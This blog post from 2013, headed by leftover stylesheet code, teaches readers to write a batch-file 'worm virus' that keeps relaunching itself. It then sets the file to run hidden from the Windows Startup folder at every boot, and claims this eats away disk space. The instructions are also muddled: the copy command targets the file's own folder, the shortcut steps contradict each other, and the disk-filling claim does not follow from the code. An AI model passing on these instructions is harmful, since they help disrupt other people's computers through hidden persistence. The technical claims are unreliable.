/* ----- LOWER SECTION ----- */ #lower { margin:auto; padding: 0px 0px 10px 0px; width: 100%; background:#333434; } #lower-wrapper { margin:auto; padding: 20px 0px 20px 0px; width: 960px; } #lowerbar-wrapper { border:1px solid #DEDEDE; background:#fff; float: left; margin: 0px 5px auto; padding-bottom: 20px; width: 32%; text-align: justify; font-size:100%; line-height: 1.6em; word-wrap: break-word; overflow: hidden; } .lowerbar {margin: 0; padding: 0;} .lowerbar .widget {margin: 0; padding: 10px 20px 0px 20px;} .lowerbar h2 { margin: 0px 0px 10px 0px; padding: 3px 0px 3px 0px; text-align: left; color:#0084ce; text-transform:uppercase; font: bold 14px Arial, Tahoma, Verdana; border-bottom:3px solid #0084ce; } .lowerbar ul { margin: 0px 0px 0px 0px; padding: 0px 0px 0px 0px; list-style-type: none; } .lowerbar li { margin: 0px 0px 2px 0px; padding: 0px 0px 1px 0px; border-bottom: 1px dotted #ccc; }

Tuesday, 26 November 2013

How to Make an Easy Worm Virus With Two Lines of Code


How to Make an Easy Worm Virus With Two Lines of Code

                     1. Log on to your computer as an administrator.

        2. Go on C drive and create a folder, name it "Programs"


3. Open up notepad and type in "@echo off"

                 4. Then, write "Copy C:\Programs\virus.bat C:\Programs" on the    second  line. On the third line write "Start C:\Programs\virus.bat".
                  5. Click "Save as" and save as virus.bat in the file (Programs) you just made.
                   6. 
If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcutA shortcut will be made on programs.

                                    7. 
Right click on the shortcut icon and click "cut" .
    
8. 
Right click on the shortcut and click "copy".


 
    9. 
Right click on your start menu and click "explore".


    10. 
Go to All Programs, then find the file named startup.




                               11. 
Paste the shortcut onto the startup folder.

                  12
Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".

             13. You have successfully made a working worm virus To start.It,restart your computer and the disk space on C drive will be eaten away.
                  14. To get rid of the worm virus just simply delete the "programs"
                                           file.

          

  • If you want to hide the programs file, go to properties and click hidden.
  • In order to delete the batch file, click "show hidden files" on folder properties and delete the shortcuts. In startup menu, they will be automatically started on system boot.            

0 comments :

Post a Comment